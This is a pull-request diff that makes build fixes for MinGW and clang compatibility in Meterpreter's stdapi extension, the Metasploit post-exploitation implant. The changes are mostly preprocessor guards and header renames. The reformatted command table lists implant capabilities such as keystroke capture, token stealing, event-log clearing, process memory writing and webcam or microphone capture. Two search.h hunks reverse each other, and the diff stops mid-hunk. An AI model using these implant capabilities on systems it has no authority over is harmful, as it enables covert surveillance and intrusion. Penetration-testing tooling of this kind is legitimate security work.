### PR TITLE
[stdapi] Add CMake makefile and fixes for clang compatibility.

### DIFF
--- a/c/meterpreter/source/extensions/stdapi/server/fs/mount_win.c
+++ b/c/meterpreter/source/extensions/stdapi/server/fs/mount_win.c
@@ -1,7 +1,8 @@
 #include "precomp.h"
 
+#ifndef __MINGW32__
 #pragma comment(lib, "mpr.lib")
-
+#endif
 // each drive is in the form "A:\\\0" (4 chars), plus a NULL terminator at the end
 #define DRIVE_STRINGS_LEN (4 * 26 + 1)
 

--- a/c/meterpreter/source/extensions/stdapi/server/fs/search.c
+++ b/c/meterpreter/source/extensions/stdapi/server/fs/search.c
@@ -46,7 +46,7 @@ VOID wds_startup(WDS_INTERFACE * pWDSInterface)
 {
 	DWORD dwResult = ERROR_SUCCESS;
 	HRESULT hr     = 0;
-
+	#ifndef __MINGW32__
 	do
 	{
 		memset(pWDSInterface, 0, sizeof(WDS_INTERFACE));
@@ -104,6 +104,7 @@ VOID wds_startup(WDS_INTERFACE * pWDSInterface)
 		} while (0);
 
 	} while (0);
+	#endif
 }
 
 /*
@@ -111,6 +112,8 @@ VOID wds_startup(WDS_INTERFACE * pWDSInterface)
  */
 VOID wds_shutdown(WDS_INTERFACE * pWDSInterface)
 {
+#ifndef __MINGW32__
+
 	do
 	{
 		if (!pWDSInterface)
@@ -152,6 +155,7 @@ VOID wds_shutdown(WDS_INTERFACE * pWDSInterface)
 		CoUninitialize();
 
 	} while (0);
+	#endif
 }
 
 /*
@@ -159,6 +163,8 @@ VOID wds_shutdown(WDS_INTERFACE * pWDSInterface)
  */
 BOOL wds2_indexed(WDS_INTERFACE * pWDSInterface, wchar_t * directory)
 {
+#ifndef __MINGW32__
+
 	wchar_t machine[MAX_COMPUTERNAME_LENGTH + 1] = {0};
 	wchar_t catalog[MAX_PATH + 1]                = {0};
 	DWORD machineLength                          = MAX_COMPUTERNAME_LENGTH + 1;
@@ -177,6 +183,7 @@ BOOL wds2_indexed(WDS_INTERFACE * pWDSInterface, wchar_t * directory)
 			return TRUE;
 		}
 	}
+#endif
 
 	return FALSE;
 }
@@ -187,12 +194,13 @@ BOOL wds2_indexed(WDS_INTERFACE * pWDSInterface, wchar_t * directory)
 BOOL wds3_indexed(WDS_INTERFACE * pWDSInterface, wchar_t * directory)
 {
 	BOOL bResult = FALSE;
+#ifndef __MINGW32__
 
-	if (pWDSInterface->bWDS3Available) {
+        if (pWDSInterface->bWDS3Available) {
 		ISearchCrawlScopeManager_IncludedInCrawlScope(
 		    pWDSInterface->pCrawlScopeManager, directory, &bResult);
 	}
-
+#endif
 	return bResult;
 }
 
@@ -213,8 +221,9 @@ HRESULT wds_execute(ICommand * pCommand, Packet * pResponse)
 	SEARCH_ROW rowSearchResults = {0};
 	HROW hRow[1]                = {0};
 	HROW * pRows                = &hRow[0];
+#ifndef __MINGW32__
 
-	do
+        do
 	{
 		hr = ICommand_Execute(pCommand, NULL, &_IID_IRowset, NULL, NULL, (IUnknown**)&pRowset);
 		if (FAILED(hr)) {
@@ -457,6 +466,7 @@ DWORD wds2_search(WDS_INTERFACE * pWDSInterface, wchar_t *directory, SEARCH_OPTI
 
 	dprintf("[SEARCH] wds2_search: Finished.");
 
+#endif
 	return dwResult;
 }
 
@@ -481,8 +491,9 @@ DWORD wds3_search(WDS_INTERFACE * pWDSInterface, wchar_t * wpProtocol, wchar_t *
 	size_t dwLength                   = 0;
 
 	dprintf("[SEARCH] wds3_search: Starting...");
+#ifndef __MINGW32__
 
-	do
+        do
 	{
 		if (!pWDSInterface) {
 			BREAK_WITH_ERROR("[SEARCH] wds3_search: !pWDSInterface", ERROR_INVALID_PARAMETER);
@@ -630,6 +641,7 @@ DWORD wds3_search(WDS_INTERFACE * pWDSInterface, wchar_t * wpProtocol, wchar_t *
 
 	dprintf("[SEARCH] wds3_search: Finished.");
 
+#endif
 	return dwResult;
 }
 
@@ -638,6 +650,8 @@ DWORD wds3_search(WDS_INTERFACE * pWDSInterface, wchar_t * wpProtocol, wchar_t *
  */
 DWORD search_files(wchar_t * directory, SEARCH_OPTIONS * pOptions, Packet * pResponse)
 {
+#ifndef __MINGW32__
+
 	wchar_t firstFile[FS_MAX_PATH];
 	swprintf_s(firstFile, FS_MAX_PATH, L"%s\\%s", directory, pOptions->glob);
 
@@ -660,13 +674,15 @@ DWORD search_files(wchar_t * directory, SEARCH_OPTIONS * pOptions, Packet * pRes
 			return GetLastError();
 		}
 	}
-
+#endif
 	return ERROR_SUCCESS;
 }
 
 DWORD directory_search(wchar_t *directory, SEARCH_OPTIONS * pOptions, Packet * pResponse, int depth)
 {
 	DWORD dwResult            = ERROR_SUCCESS;
+#ifndef __MINGW32__
+
 	BOOL bAllreadySearched    = FALSE;
 	WIN32_FIND_DATAW FindData = {0};
 	size_t len                = wcslen(directory) + 5;
@@ -722,7 +738,7 @@ DWORD directory_search(wchar_t *directory, SEARCH_OPTIONS * pOptions, Packet * p
 	}
 
 	free(firstFile);
-
+#endif
 	return dwResult;
 }
 
@@ -733,8 +749,9 @@ DWORD directory_search(wchar_t *directory, SEARCH_OPTIONS * pOptions, Packet * p
 DWORD search(WDS_INTERFACE * pWDSInterface, wchar_t *directory, SEARCH_OPTIONS * pOptions, Packet * pResponse)
 {
 	DWORD dwResult           = ERROR_ACCESS_DENIED;
+#ifndef __MINGW32__
 
-	if (!directory)
+        if (!directory)
 		directory = pOptions->rootDirectory;
 
 	if (!directory) {
@@ -752,7 +769,7 @@ DWORD search(WDS_INTERFACE * pWDSInterface, wchar_t *directory, SEARCH_OPTIONS *
 			dwResult = directory_search(directory, pOptions, pResponse, 0);
 		}
 	}
-
+#endif
 	return dwResult;
 }
 
@@ -760,6 +777,8 @@ DWORD search_all_drives(WDS_INTERFACE *pWDSInterface, SEARCH_OPTIONS *options, P
 {
 	DWORD dwLogicalDrives = GetLogicalDrives();
 	DWORD dwResult;
+#ifndef __MINGW32__
+
 	for (wchar_t index = L'a'; index <= L'z'; index++)
 	{
 		if (dwLogicalDrives & (1 << (index-L'a')))
@@ -784,6 +803,7 @@ DWORD search_all_drives(WDS_INTERFACE *pWDSInterface, SEARCH_OPTIONS *options, P
 	}
 
 	options->rootDirectory = NULL;
+	#endif
 	return dwResult;
 }
 
@@ -793,6 +813,8 @@ DWORD search_all_drives(WDS_INTERFACE *pWDSInterface, SEARCH_OPTIONS *options, P
 DWORD request_fs_search(Remote * pRemote, Packet * pPacket)
 {
 	DWORD dwResult              = ERROR_SUCCESS;
+#ifndef __MINGW32__
+
 	Packet * pResponse          = NULL;
 	SEARCH_OPTIONS options      = {0};
 	WDS_INTERFACE WDSInterface  = {0};
@@ -876,6 +898,6 @@ DWORD request_fs_search(Remote * pRemote, Packet * pPacket)
 	wds_shutdown(&WDSInterface);
 
 	dprintf("[SEARCH] request_fs_search: Finished. dwResult=0x%08X", dwResult);
-
+#endif
 	return dwResult;
 }

--- a/c/meterpreter/source/extensions/stdapi/server/fs/search.h
+++ b/c/meterpreter/source/extensions/stdapi/server/fs/search.h
@@ -2,7 +2,7 @@
 #define _METERPRETER_SOURCE_EXTENSION_STDAPI_STDAPI_SERVER_FS_SEARCH_H
 
 #include <shlwapi.h>
-#include <Searchapi.h>
+#include <searchapi.h>
 #include <msdasc.h>
 #include <ntquery.h>
 #include <cmdtree.h>

--- a/c/meterpreter/source/extensions/stdapi/server/fs/search.h
+++ b/c/meterpreter/source/extensions/stdapi/server/fs/search.h
@@ -2,7 +2,7 @@
 #define _METERPRETER_SOURCE_EXTENSION_STDAPI_STDAPI_SERVER_FS_SEARCH_H
 
 #include <shlwapi.h>
-#include <searchapi.h>
+#include <Searchapi.h>
 #include <msdasc.h>
 #include <ntquery.h>
 #include <cmdtree.h>

--- a/c/meterpreter/source/extensions/stdapi/server/net/config/netstat.c
+++ b/c/meterpreter/source/extensions/stdapi/server/net/config/netstat.c
@@ -101,6 +101,8 @@ char *tcp_connection_states[] = {
    "", "CLOSED", "LISTEN", "SYN_SENT", "SYN_RECV", "ESTABLISHED", "FIN_WAIT1", "FIN_WAIT2", "CLOSE_WAIT",
    "CLOSING", "LAST_ACK", "TIME_WAIT", "DELETE_TCB", "UNKNOWN" };
 
+#ifndef __MINGW32__
+
 typedef struct _MIB_TCP6ROW_OWNER_MODULE {
   UCHAR         ucLocalAddr[16];
   DWORD         dwLocalScopeId;
@@ -134,10 +136,12 @@ typedef struct _MIB_TCP6TABLE_OWNER_MODULE {
   MIB_TCP6ROW_OWNER_MODULE table[ANY_SIZE];
 } MIB_TCP6TABLE_OWNER_MODULE, *PMIB_TCP6TABLE_OWNER_MODULE;
 
+
 typedef struct {
   DWORD                    dwNumEntries;
   MIB_UDP6ROW_OWNER_MODULE table[ANY_SIZE];
 } MIB_UDP6TABLE_OWNER_MODULE, *PMIB_UDP6TABLE_OWNER_MODULE;
+#endif
 
 typedef DWORD (WINAPI * ptr_GetExtendedTcpTable)(PVOID, PDWORD pdwSize, BOOL bOrder, ULONG ulAf,TCP_TABLE_CLASS TableClass,
 ULONG Reserved);

--- a/c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c
+++ b/c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c
@@ -13,7 +13,7 @@
 #ifndef IPPROTO_IPV6
 #define IPPROTO_IPV6 41
 #endif
-#ifndef in6addr_any
+#if !defined in6addr_any && !defined __MINGW32__
 extern IN6_ADDR in6addr_any;
 #endif
 

--- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
+++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
@@ -31,6 +31,10 @@
 #include "precomp.h"
 #include "railgun.h"
 
+#ifndef ERROR_UNHANDLED_EXCEPTION
+#define ERROR_UNHANDLED_EXCEPTION 579
+#endif
+
 // Gives me a copy of a data item of type TLV_META_TYPE_RAW
 // caller has to free() it.
 // returns NULL on fail

--- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c
+++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -18,154 +18,161 @@ EnableDelayLoadMetSrv();
 extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
 
 Command customCommands[] =
-{
-	// General
-	COMMAND_REQ("core_channel_open", request_general_channel_open),
+	{
+		// General
+		COMMAND_REQ("core_channel_open", request_general_channel_open),
 
-	// Railgun
-	COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
-	COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
-	COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
-	COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
+		// Railgun
+		COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
+		COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
+		COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
+		COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
 
-	// Fs
-	COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
-	COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
-	COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
-	COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
-	COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
-	COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
-	COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
-	COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
-	COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
-	COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
-	COMMAND_REQ("stdapi_fs_file_copy", request_fs_file_copy),
-	COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
-	COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
-	COMMAND_REQ("stdapi_fs_search", request_fs_search),
-	COMMAND_REQ("stdapi_fs_mount_show", request_fs_mount_show),
+		// Fs
+		COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
+		COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
+		COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
+		COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
+		COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
+		COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
+		COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
+		COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
+		COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
+		COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
+		COMMAND_REQ("stdapi_fs_file_copy", request_fs_file_copy),
+		COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
+		COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
+		COMMAND_REQ("stdapi_fs_search", request_fs_search),
+		COMMAND_REQ("stdapi_fs_mount_show", request_fs_mount_show),
 
-	// Process
-	COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
-	COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
-	COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
-	COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
-	COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
-	COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
-	COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
-	COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),
+		// Process
+		COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
+		COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
+		COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
+		COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
+		COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
+		COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
+		COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
+		COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),
 
-	// Image
-	COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
-	COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
-	COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
-	COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),
+		// Image
+		COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
+		COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
+		COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
+		COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),
 
-	// Memory
-	COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
-	COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
-	COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
-	COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
-	COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
-	COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
-	COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
-	COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),
+		// Memory
+		COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
+		COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
+		COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
+		COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
+		COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
+		COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
+		COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
+		COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),
 
-	// Thread
-	COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
-	COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
-	COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
-	COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
-	COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
-	COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
-	COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
-	COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
-	COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),
+		// Thread
+		COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
+		COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
+		COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
+		COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
+		COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
+		COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
+		COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
+		COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
+		COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),
 
-	// Registry
-	COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
-	COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
-	COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
-	COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
-	COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
-	COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
-	COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
-	COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
-	COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
-	COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
-	COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
-	COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
-	COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
-	COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
-	COMMAND_REQ("stdapi_registry_enum_key_direct", request_registry_enum_key_direct),
-	COMMAND_REQ("stdapi_registry_enum_value_direct", request_registry_enum_value_direct),
-	COMMAND_REQ("stdapi_registry_query_value_direct", request_registry_query_value_direct),
-	COMMAND_REQ("stdapi_registry_set_value_direct", request_registry_set_value_direct),
+		// Registry
+		COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
+		COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
+		COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
+		COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
+		COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
+		COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
+		COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
+		COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
+		COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
+		COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
+		COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
+		COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
+		COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
+		COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
+		COMMAND_REQ("stdapi_registry_enum_key_direct", request_registry_enum_key_direct),
+		COMMAND_REQ("stdapi_registry_enum_value_direct", request_registry_enum_value_direct),
+		COMMAND_REQ("stdapi_registry_query_value_direct", request_registry_query_value_direct),
+		COMMAND_REQ("stdapi_registry_set_value_direct", request_registry_set_value_direct),
 
-	// Sys/config
-	COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
-	COMMAND_REQ("stdapi_sys_config_localtime", request_sys_config_localtime),
-	COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
-	COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
-	COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
-	COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
-	COMMAND_REQ("stdapi_sys_config_driver_list", request_sys_config_driver_list),
-	COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
-	COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
-	COMMAND_REQ("stdapi_sys_config_getsid", request_sys_config_getsid),
+		// Sys/config
+		COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
+		COMMAND_REQ("stdapi_sys_config_localtime", request_sys_config_localtime),
+		COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
+		COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
+		COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
+		COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
+		COMMAND_REQ("stdapi_sys_config_driver_list", request_sys_config_driver_list),
+		COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
+		COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
+		COMMAND_REQ("stdapi_sys_config_getsid", request_sys_config_getsid),
 
-	// Net
-	COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
-	COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
-	COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
-	COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
-	COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
-	COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),
+		// Net
+		COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
+		COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
+		COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
+		COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
+		COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
+		COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),
 
-	// Proxy
-	COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
-	// Resolve
-	COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
-	COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),
+		// Proxy
+		COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
+		// Resolve
+		COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
+		COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),
 
-	// Socket
-	COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),
+		// Socket
+		COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),
 
-	// UI
-	COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
-	COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
-	COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
-	COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
-	COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
-	COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
-	COMMAND_REQ("stdapi_ui_get_keys_utf8", request_ui_get_keys_utf8),
-	COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
-	COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
-	COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
-	COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
+		// UI
+		COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
+		COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
+		COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
+		COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
+		COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
+		COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
+		COMMAND_REQ("stdapi_ui_get_keys_utf8", request_ui_get_keys_utf8),
+		COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
+		COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
+		COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
+		COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
 
-	// Event Log
-	COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
-	COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
-	COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
-	COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
-	COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
-	COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),
+		// Event Log
+		COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
+		COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
+		COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
+		COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
+		COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
+		COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),
 
-	// Power
-	COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),
+		// Power
+		COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),
 
-	// Webcam
-	COMMAND_REQ("webcam_list", request_webcam_list),
-	COMMAND_REQ("webcam_start", request_webcam_start),
-	COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
-	COMMAND_REQ("webcam_stop", request_webcam_stop),
+// Webcam
+#ifndef __MINGW32__ // weird linking errors for these functions
 
-	// Audio
-	COMMAND_REQ("webcam_audio_record", request_ui_record_mic),
+		COMMAND_REQ("webcam_list", request_webcam_list),
+		COMMAND_REQ("webcam_start", request_webcam_start),
+		COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
+		COMMAND_REQ("webcam_stop", request_webcam_stop),
+#endif
+		// Audio
+		COMMAND_REQ("webcam_audio_record", request_ui_record_mic),
 
-	COMMAND_TERMINATOR
-};
+		COMMAND_TERMINATOR};
+
+//---test
+
+#ifdef __MINGW32__
+typedef void( *fn_command_register_all)(Command*);
+#endif
 
 /*!
  * @brief Initialize the server extension.
@@ -176,7 +183,12 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
 {
 	hMetSrv = remote->met_srv;
 
+	#ifdef __MINGW32__
+	fn_command_register_all cmd_register_all = (fn_command_register_all)GetProcAddressR(hMetSrv, "command_register_all");
+	cmd_register_all(customCommands);
+	#else
 	command_register_all(customCommands);
+	#endif
 
 	return ERROR_SUCCESS;
 }

--- a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@@ -1,13 +1,14 @@
 #include "precomp.h"
 
-#include <Sddl.h>
-#include <Lm.h>
+#include <sddl.h>
+#include <lm.h>
 #include <psapi.h>
 
 typedef NTSTATUS(WINAPI *PRtlGetVersion)(LPOSVERSIONINFOEXW);
 
+#ifndef __MINGW32__
 #pragma comment(lib, "netapi32.lib")
-
+#endif
 /*!
  * @brief Add an environment variable / value pair to a response packet.
  * @param response The \c Response packet to add the values to.

--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/image.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/image.c
@@ -217,18 +217,22 @@ DWORD request_sys_process_image_get_images(Remote *remote, Packet *packet)
 			break;
 
 		// Try to resolve the address of EnumProcessModules
-		if (!((LPVOID)enumProcessModules = 
-				(LPVOID)GetProcAddress(psapi, "EnumProcessModules")))
+		enumProcessModules = 
+				(LPVOID)GetProcAddress(psapi, "EnumProcessModules");
+		if (!enumProcessModules)
 			break;
 
 		// Try to resolve the address of GetModuleBaseNameA
-		if (!((LPVOID)getModuleBaseName = 
-				(LPVOID)GetProcAddress(psapi, "GetModuleBaseNameA")))
+		getModuleBaseName = 
+				(LPVOID)GetProcAddress(psapi, "GetModuleBaseNameA");
+		if (!getModuleBaseName)
 			break;
 
 		// Try to resolve the address of GetModuleFileNameExA
-		if (!((LPVOID)getModuleFileNameEx = 
-				(LPVOID)GetProcAddress(psapi, "GetModuleFileNameExA")))
+		getModuleFileNameEx = 
